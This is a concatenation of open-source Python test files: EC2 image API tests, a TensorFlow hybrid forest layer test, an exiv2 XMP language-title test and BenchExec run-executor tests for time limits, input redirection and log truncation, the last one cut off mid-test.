device_name = image['RootDeviceName']
bdm = image['BlockDeviceMappings']
bdm = [v for v in bdm if v['DeviceName'] == device_name]
self.assertEqual(1, len(bdm))
bdm = bdm[0]
self.assertIn('Ebs', bdm)
ebs = bdm['Ebs']
self.assertIsNotNone(ebs.get('SnapshotId'))
self.assertIsNotNone(ebs.get('DeleteOnTermination'))
self.assertIsNotNone(ebs.get('VolumeSize'))
if CONF.aws.run_incompatible_tests:
self.assertIsNotNone(ebs.get('Encrypted'))
self.assertFalse(ebs.get('Encrypted'))
self.assertIsNotNone(ebs.get('VolumeType'))
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_describe_image_with_filters(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
data = self.client.describe_images(
# NOTE(ft): limit output to prevent timeout over AWS
Filters=[{'Name': 'image-type', 'Values': ['kernel', 'ramdisk']}])
if len(data['Images']) < 2:
self.skipTest("Insufficient images to check filters")
data = self.client.describe_images(
Filters=[{'Name': 'image-id', 'Values': [image_id]}])
self.assertEqual(1, len(data['Images']))
self.assertEqual(image_id, data['Images'][0]['ImageId'])
def test_check_image_operations_negative(self):
# NOTE(andrey-mp): image_id is a public image created by admin
image_id = CONF.aws.image_id
self.assertRaises('InvalidRequest',
self.client.describe_image_attribute,
ImageId=image_id, Attribute='unsupported')
self.assertRaises('AuthFailure',
self.client.describe_image_attribute,
ImageId=image_id, Attribute='description')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='unsupported')
self.assertRaises('InvalidParameter',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='blockDeviceMapping')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id)
self.assertRaises('AuthFailure',
self.client.modify_image_attribute,
ImageId=image_id, Description={'Value': 'fake'})
self.assertRaises('AuthFailure',
self.client.modify_image_attribute,
ImageId=image_id, LaunchPermission={'Add': [{'Group': 'all'}]})
self.assertRaises('MissingParameter',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='description')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='launchPermission')
self.assertRaises('InvalidRequest',
self.client.reset_image_attribute,
ImageId=image_id, Attribute='fake')
self.assertRaises('AuthFailure',
self.client.reset_image_attribute,
ImageId=image_id, Attribute='launchPermission')
self.assertRaises('AuthFailure',
self.client.deregister_image,
ImageId=image_id)
@testtools.skipUnless(CONF.aws.image_id, 'image id is not defined')
def test_create_image_from_non_ebs_instance(self):
image_id = CONF.aws.image_id
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
if 'RootDeviceType' in image and 'ebs' in image['RootDeviceType']:
raise self.skipException('image_id should not be EBS image.')
instance_id = self.run_instance(ImageId=image_id)
def _rollback(fn_data):
self.client.deregister_image(ImageId=fn_data['ImageId'])
self.assertRaises('InvalidParameterValue',
self.client.create_image, rollback_fn=_rollback,
InstanceId=instance_id, Name='name', Description='desc')
data = self.client.terminate_instances(InstanceIds=[instance_id])
self.get_instance_waiter().wait_delete(instance_id)
def _create_image(self, name, desc, extra_run_instance_args={}):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
self.assertTrue('RootDeviceType' in image
and 'ebs' in image['RootDeviceType'])
instance_id = self.run_instance(ImageId=image_id,
**extra_run_instance_args)
instance = self.get_instance(instance_id)
for bdm in instance.get('BlockDeviceMappings', []):
if 'Ebs' in bdm:
self.addResourceCleanUp(self.client.delete_volume,
VolumeId=bdm['Ebs']['VolumeId'])
data = self.client.create_image(InstanceId=instance_id,
Name=name, Description=desc)
image_id = data['ImageId']
image_clean = self.addResourceCleanUp(self.client.deregister_image,
ImageId=image_id)
self.get_image_waiter().wait_available(image_id)
data = self.client.describe_images(ImageIds=[image_id])
for bdm in data['Images'][0].get('BlockDeviceMappings', []):
if 'Ebs' in bdm and 'SnapshotId' in bdm['Ebs']:
snapshot_id = bdm['Ebs']['SnapshotId']
self.addResourceCleanUp(self.client.delete_snapshot,
SnapshotId=snapshot_id)
data = self.client.terminate_instances(InstanceIds=[instance_id])
self.get_instance_waiter().wait_delete(instance_id)
return image_id, image_clean
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_create_image_from_ebs_instance(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('description')
image_id, image_clean = self._create_image(name, desc)
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertIsNotNone(image['CreationDate'])
self.assertEqual("ebs", image['RootDeviceType'])
self.assertFalse(image['Public'])
self.assertEqual(name, image['Name'])
self.assertEqual(desc, image['Description'])
self.assertEqual('machine', image['ImageType'])
self.assertNotEmpty(image['BlockDeviceMappings'])
for bdm in image['BlockDeviceMappings']:
self.assertIn('DeviceName', bdm)
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_simple_image_attributes(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('desc for image')
image_id, image_clean = self._create_image(name, desc)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='kernel')
self.assertIn('KernelId', data)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='ramdisk')
self.assertIn('RamdiskId', data)
# description
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='description')
self.assertIn('Description', data)
self.assertIn('Value', data['Description'])
self.assertEqual(desc, data['Description']['Value'])
def _modify_description(**kwargs):
self.client.modify_image_attribute(ImageId=image_id, **kwargs)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='description')
self.assertEqual(new_desc, data['Description']['Value'])
new_desc = data_utils.rand_name('new desc')
_modify_description(Attribute='description', Value=new_desc)
_modify_description(Description={'Value': new_desc})
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_bdm_in_image(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
root_device_name = data['Images'][0]['RootDeviceName']
device_name_prefix = base.get_device_name_prefix(root_device_name)
device_name = device_name_prefix + 'h'
name = data_utils.rand_name('image')
desc = data_utils.rand_name('description')
image_id, image_clean = self._create_image(
name, desc,
extra_run_instance_args={
'BlockDeviceMappings': [{'DeviceName': device_name,
'Ebs': {'VolumeSize': 1}}]})
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
for bdm in image['BlockDeviceMappings']:
self.assertTrue('DeviceName', bdm)
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.run_incompatible_tests,
'By default glance is configured as "publicize_image": "role:admin"')
@testtools.skipUnless(CONF.aws.run_incompatible_tests,
'skip due to bug #1439819')
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_launch_permission_attribute(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('desc for image')
image_id, image_clean = self._create_image(name, desc)
# launch permission
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertIn('LaunchPermissions', data)
self.assertEmpty(data['LaunchPermissions'])
def _modify_launch_permission(**kwargs):
self.client.modify_image_attribute(ImageId=image_id, **kwargs)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertIn('LaunchPermissions', data)
self.assertNotEmpty(data['LaunchPermissions'])
self.assertIn('Group', data['LaunchPermissions'][0])
self.assertEqual('all', data['LaunchPermissions'][0]['Group'])
data = self.client.describe_images(ImageIds=[image_id])
self.assertTrue(data['Images'][0]['Public'])
self.client.reset_image_attribute(
ImageId=image_id, Attribute='launchPermission')
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertEmpty(data['LaunchPermissions'])
data = self.client.describe_images(ImageIds=[image_id])
self.assertFalse(data['Images'][0]['Public'])
_modify_launch_permission(Attribute='launchPermission',
OperationType='add', UserGroups=['all'])
_modify_launch_permission(LaunchPermission={'Add': [{'Group': 'all'}]})
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
class ImageRegisterTest(base.EC2TestCase):
valid_image_state = set(('available', 'pending', 'failed'))
@classmethod
@base.safe_setup
def setUpClass(cls):
super(ImageRegisterTest, cls).setUpClass()
cls.image_location = CONF.aws.ami_image_location
if not cls.image_location:
raise cls.skipException('Image materials are not ready in S3')
def test_register_get_deregister_ami_image(self):
image_name = data_utils.rand_name("ami-name")
data = self.client.register_image(
Name=image_name, ImageLocation=self.image_location)
image_id = data['ImageId']
image_clean = self.addResourceCleanUp(self.client.deregister_image,
ImageId=image_id)
self.assertEqual(image_id[0:3], "ami")
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertEqual(image_name, image['Name'])
self.assertEqual(image_id, image['ImageId'])
self.assertIn(image['State'], self.valid_image_state)
self.get_image_waiter().wait_available(image_id)
self.client.deregister_image(ImageId=image_id)
self.assertRaises('InvalidAMIID.NotFound',
self.client.describe_images,
ImageIds=[image_id])
self.cancelResourceCleanUp(image_clean)
| apache-2.0 | 8,902,283,319,252,786,000 | 42.417647 | 79 | 0.628641 | false | 3.985421 | true | false | false |
AsimmHirani/ISpyPi | tensorflow/contrib/tensorflow-master/tensorflow/contrib/tensor_forest/hybrid/python/hybrid_layer_test.py | 158 | 2156 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the hybrid tensor forest model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.hybrid.python import hybrid_model
from tensorflow.contrib.tensor_forest.hybrid.python.layers import fully_connected
from tensorflow.contrib.tensor_forest.python import tensor_forest
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class HybridLayerTest(test_util.TensorFlowTestCase):
def setUp(self):
self.params = tensor_forest.ForestHParams(
num_classes=3,
num_features=7,
layer_size=11,
num_layers=13,
num_trees=17,
connection_probability=0.1,
hybrid_tree_depth=4,
regularization_strength=0.01,
regularization="",
weight_init_mean=0.0,
weight_init_std=0.1)
self.params.num_nodes = 2**self.params.hybrid_tree_depth - 1
self.params.num_leaves = 2**(self.params.hybrid_tree_depth - 1)
def testLayerNums(self):
l1 = fully_connected.FullyConnectedLayer(self.params, 0, None)
self.assertEquals(l1.layer_num, 0)
l2 = fully_connected.FullyConnectedLayer(self.params, 1, None)
self.assertEquals(l2.layer_num, 1)
l3 = fully_connected.FullyConnectedLayer(self.params, 2, None)
self.assertEquals(l3.layer_num, 2)
if __name__ == "__main__":
googletest.main()
| apache-2.0 | -4,702,249,139,691,213,000 | 35.542373 | 81 | 0.699443 | false | 3.843137 | true | false | false |
AlienCowEatCake/ImageViewer | src/ThirdParty/Exiv2/exiv2-0.27.3-Source/tests/bugfixes/redmine/test_issue_1058.py | 3 | 1394 | # -*- coding: utf-8 -*-
import system_tests
@system_tests.CopyFiles("$data_path/exiv2-empty.jpg")
class CheckXmlLang(metaclass=system_tests.CaseMeta):
url = "http://dev.exiv2.org/issues/1058"
filename = system_tests.path("$data_path/exiv2-empty_copy.jpg")
commands = [
## Add titles in 2 languages and one default
"""$exiv2 -M"set Xmp.dc.title lang=de-DE GERMAN" $filename""",
"""$exiv2 -M"set Xmp.dc.title lang=en-GB BRITISH" $filename""",
"""$exiv2 -M"set Xmp.dc.title Everybody else" $filename""",
"""$exiv2 -px $filename""",
## Remove languages, test case for the language
"""$exiv2 -M"set Xmp.dc.title lang=DE-de german" $filename""",
"""$exiv2 -M"set Xmp.dc.title lang=EN-gb" $filename""",
"""$exiv2 -M"set Xmp.dc.title" $filename""",
"""$exiv2 -px $filename""",
]
stdout = [
"",
"",
"",
"""Xmp.dc.title LangAlt 3 lang="x-default" Everybody else, lang="en-GB" BRITISH, lang="de-DE" GERMAN
""",
"",
"",
"",
"""Xmp.dc.title LangAlt 1 lang="de-DE" german
""",
]
stderr = [""] * len(commands)
retval = [0] * len(commands)
| gpl-3.0 | 9,075,416,117,488,455,000 | 35.684211 | 145 | 0.479914 | false | 3.375303 | false | false | false |
ultimate-pa/benchexec | benchexec/test_runexecutor.py | 1 | 43124 | # This file is part of BenchExec, a framework for reliable benchmarking:
# https://github.com/sosy-lab/benchexec
#
# SPDX-FileCopyrightText: 2007-2020 Dirk Beyer <https://www.sosy-lab.org>
#
# SPDX-License-Identifier: Apache-2.0
import contextlib
import logging
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import shutil
from benchexec import container
from benchexec import containerexecutor
from benchexec import filehierarchylimit
from benchexec.runexecutor import RunExecutor
from benchexec import runexecutor
from benchexec import util
sys.dont_write_bytecode = True # prevent creation of .pyc files
here = os.path.dirname(__file__)
base_dir = os.path.join(here, "..")
bin_dir = os.path.join(base_dir, "bin")
runexec = os.path.join(bin_dir, "runexec")
trivial_run_grace_time = 0.2
class TestRunExecutor(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.longMessage = True
cls.maxDiff = None
logging.disable(logging.NOTSET) # need to make sure to get all messages
if not hasattr(cls, "assertRegex"):
cls.assertRegex = cls.assertRegexpMatches
def setUp(self, *args, **kwargs):
with self.skip_if_logs(
"Cannot reliably kill sub-processes without freezer cgroup"
):
self.runexecutor = RunExecutor(use_namespaces=False, *args, **kwargs)
@contextlib.contextmanager
def skip_if_logs(self, error_msg):
"""A context manager that automatically marks the test as skipped if SystemExit
is thrown and the given error message had been logged with level ERROR."""
# Note: assertLogs checks that there is at least one log message of given level.
# This is not what we want, so we just rely on one debug message being present.
try:
with self.assertLogs(level=logging.DEBUG) as log:
yield
except SystemExit as e:
if any(
record.levelno == logging.ERROR and record.msg.startswith(error_msg)
for record in log.records
):
self.skipTest(e)
raise e
def execute_run(self, *args, expect_terminationreason=None, **kwargs):
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
try:
result = self.runexecutor.execute_run(list(args), output_filename, **kwargs)
output = os.read(output_fd, 4096).decode()
finally:
os.close(output_fd)
os.remove(output_filename)
self.check_result_keys(result, "terminationreason")
if isinstance(expect_terminationreason, list):
self.assertIn(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
else:
self.assertEqual(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
return (result, output.splitlines())
def get_runexec_cmdline(self, *args, **kwargs):
return [
"python3",
runexec,
"--no-container",
"--output",
kwargs["output_filename"],
] + list(args)
def execute_run_extern(self, *args, expect_terminationreason=None, **kwargs):
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
try:
runexec_output = subprocess.check_output(
args=self.get_runexec_cmdline(*args, output_filename=output_filename),
stderr=subprocess.DEVNULL,
universal_newlines=True,
**kwargs,
)
output = os.read(output_fd, 4096).decode()
except subprocess.CalledProcessError as e:
print(e.output)
raise e
finally:
os.close(output_fd)
os.remove(output_filename)
result = {
key.strip(): value.strip()
for (key, _, value) in (
line.partition("=") for line in runexec_output.splitlines()
)
}
self.check_result_keys(result, "terminationreason", "returnvalue")
if isinstance(expect_terminationreason, list):
self.assertIn(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
else:
self.assertEqual(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
return (result, output.splitlines())
def check_command_in_output(self, output, cmd):
self.assertEqual(output[0], cmd, "run output misses executed command")
def check_result_keys(self, result, *additional_keys):
expected_keys = {
"cputime",
"walltime",
"memory",
"exitcode",
"cpuenergy",
"blkio-read",
"blkio-write",
"starttime",
}
expected_keys.update(additional_keys)
for key in result.keys():
if key.startswith("cputime-cpu"):
self.assertRegex(
key,
"^cputime-cpu[0-9]+$",
f"unexpected result entry '{key}={result[key]}'",
)
elif key.startswith("cpuenergy-"):
self.assertRegex(
key,
"^cpuenergy-pkg[0-9]+-(package|core|uncore|dram|psys)$",
f"unexpected result entry '{key}={result[key]}'",
)
else:
self.assertIn(
key,
expected_keys,
f"unexpected result entry '{key}={result[key]}'",
)
def check_exitcode(self, result, exitcode, msg=None):
self.assertEqual(result["exitcode"].raw, exitcode, msg)
def check_exitcode_extern(self, result, exitcode, msg=None):
exitcode = util.ProcessExitCode.from_raw(exitcode)
if exitcode.value is not None:
self.assertEqual(int(result["returnvalue"]), exitcode.value, msg)
else:
self.assertEqual(int(result["exitsignal"]), exitcode.signal, msg)
def test_command_output(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(_, output) = self.execute_run("/bin/echo", "TEST_TOKEN")
self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_command_error_output(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
def execute_Run_intern(*args, **kwargs):
(error_fd, error_filename) = tempfile.mkstemp(".log", "error_", text=True)
try:
(_, output_lines) = self.execute_run(
*args, error_filename=error_filename, **kwargs
)
error_lines = os.read(error_fd, 4096).decode().splitlines()
return (output_lines, error_lines)
finally:
os.close(error_fd)
os.remove(error_filename)
(output_lines, error_lines) = execute_Run_intern(
"/bin/sh", "-c", "/bin/echo ERROR_TOKEN >&2"
)
self.assertEqual(
error_lines[-1], "ERROR_TOKEN", "run error output misses command output"
)
for line in output_lines[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
for line in error_lines[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run error output")
(output_lines, error_lines) = execute_Run_intern("/bin/echo", "OUT_TOKEN")
self.check_command_in_output(output_lines, "/bin/echo OUT_TOKEN")
self.check_command_in_output(error_lines, "/bin/echo OUT_TOKEN")
self.assertEqual(
output_lines[-1], "OUT_TOKEN", "run output misses command output"
)
for line in output_lines[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
for line in error_lines[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run error output")
def test_command_result(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(result, _) = self.execute_run("/bin/echo", "TEST_TOKEN")
self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="walltime of /bin/echo not as expected",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/echo not as expected",
)
self.check_result_keys(result)
def test_wrong_command(self):
(result, _) = self.execute_run(
"/does/not/exist", expect_terminationreason="failed"
)
def test_wrong_command_extern(self):
(result, _) = self.execute_run(
"/does/not/exist", expect_terminationreason="failed"
)
def test_cputime_hardlimit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
hardtimelimit=1,
expect_terminationreason="cputime",
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_cputime_softlimit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs(
"Soft time limit cannot be specified without cpuacct cgroup"
):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
softtimelimit=1,
expect_terminationreason="cputime-soft",
)
self.check_exitcode(result, 15, "exit code of killed process is not 15")
self.assertAlmostEqual(
result["walltime"],
4,
delta=3,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
4,
delta=3,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_walltime_limit(self):
if not os.path.exists("/bin/sleep"):
self.skipTest("missing /bin/sleep")
(result, output) = self.execute_run(
"/bin/sleep", "10", walltimelimit=1, expect_terminationreason="walltime"
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
4,
delta=3,
msg="walltime is not approximately the time after which the process should have been killed",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/sleep is not approximately zero",
)
self.check_command_in_output(output, "/bin/sleep 10")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_cputime_walltime_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
hardtimelimit=1,
walltimelimit=5,
expect_terminationreason="cputime",
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_all_timelimits(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
softtimelimit=1,
hardtimelimit=2,
walltimelimit=5,
expect_terminationreason="cputime-soft",
)
self.check_exitcode(result, 15, "exit code of killed process is not 15")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_devnull(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(result, output) = self.execute_run("/bin/cat", walltimelimit=1)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result)
self.check_command_in_output(output, "/bin/cat")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_file(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
with tempfile.TemporaryFile() as tmp:
tmp.write(b"TEST_TOKEN")
tmp.flush()
tmp.seek(0)
(result, output) = self.execute_run("/bin/cat", stdin=tmp, walltimelimit=1)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result)
self.check_command_in_output(output, "/bin/cat")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_stdin(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
cmd = self.get_runexec_cmdline(
"--input",
"-",
"--walltime",
"1",
"/bin/cat",
output_filename=output_filename,
)
try:
process = subprocess.Popen(
args=cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
)
try:
runexec_output, unused_err = process.communicate("TEST_TOKEN")
except BaseException:
# catch everything, we re-raise
process.kill()
process.wait()
raise
retcode = process.poll()
if retcode:
print(runexec_output)
raise subprocess.CalledProcessError(retcode, cmd, output=runexec_output)
output = os.read(output_fd, 4096).decode().splitlines()
finally:
os.close(output_fd)
os.remove(output_filename)
result = {
key.strip(): value.strip()
for (key, _, value) in (
line.partition("=") for line in runexec_output.splitlines()
)
}
self.check_exitcode_extern(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
float(result["walltime"].rstrip("s")),
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
float(result["cputime"].rstrip("s")),
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result, "returnvalue")
self.check_command_in_output(output, "/bin/cat")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_append_environment_variable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(_, output) = self.execute_run("/bin/sh", "-c", "echo $PATH")
path = output[-1]
(_, output) = self.execute_run(
"/bin/sh",
"-c",
"echo $PATH",
environments={"additionalEnv": {"PATH": ":TEST_TOKEN"}},
)
self.assertEqual(output[-1], path + ":TEST_TOKEN")
def test_new_environment_variable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(_, output) = self.execute_run(
"/bin/sh", "-c", "echo $PATH", environments={"newEnv": {"PATH": "/usr/bin"}}
)
self.assertEqual(output[-1], "/usr/bin")
def test_stop_run(self):
if not os.path.exists("/bin/sleep"):
self.skipTest("missing /bin/sleep")
thread = _StopRunThread(1, self.runexecutor)
thread.start()
(result, output) = self.execute_run(
"/bin/sleep", "10", expect_terminationreason="killed"
)
thread.join()
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/sleep is not approximately zero",
)
self.check_command_in_output(output, "/bin/sleep 10")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_reduce_file_size_empty_file(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
self.assertEqual(os.path.getsize(tmp.name), 0)
def test_reduce_file_size_empty_file2(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
self.assertEqual(os.path.getsize(tmp.name), 0)
def test_reduce_file_size_long_line_not_truncated(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
content = "Long line " * 500
tmp.write(content)
tmp.flush()
runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
with open(tmp.name, "rt") as tmp2:
self.assertMultiLineEqual(tmp2.read(), content)
REDUCE_WARNING_MSG = (
"WARNING: YOUR LOGFILE WAS TOO LONG, SOME LINES IN THE MIDDLE WERE REMOVED."
)
REDUCE_OVERHEAD = 100
def test_reduce_file_size(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
line = "Some text\n"
tmp.write(line * 500)
tmp.flush()
limit = 500
runexecutor._reduce_file_size_if_necessary(tmp.name, limit)
self.assertLessEqual(
os.path.getsize(tmp.name), limit + self.REDUCE_OVERHEAD
)
with open(tmp.name, "rt") as tmp2:
new_content = tmp2.read()
self.assertIn(self.REDUCE_WARNING_MSG, new_content)
self.assertTrue(new_content.startswith(line))
self.assertTrue(new_content.endswith(line))
def test_reduce_file_size_limit_zero(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
line = "Some text\n"
tmp.write(line * 500)
tmp.flush()
runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
self.assertLessEqual(os.path.getsize(tmp.name), self.REDUCE_OVERHEAD)
with open(tmp.name, "rt") as tmp2:
new_content = tmp2.read()
self.assertIn(self.REDUCE_WARNING_MSG, new_content)
self.assertTrue(new_content.startswith(line))
def test_append_crash_dump_info(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run(
"/bin/sh",
"-c",
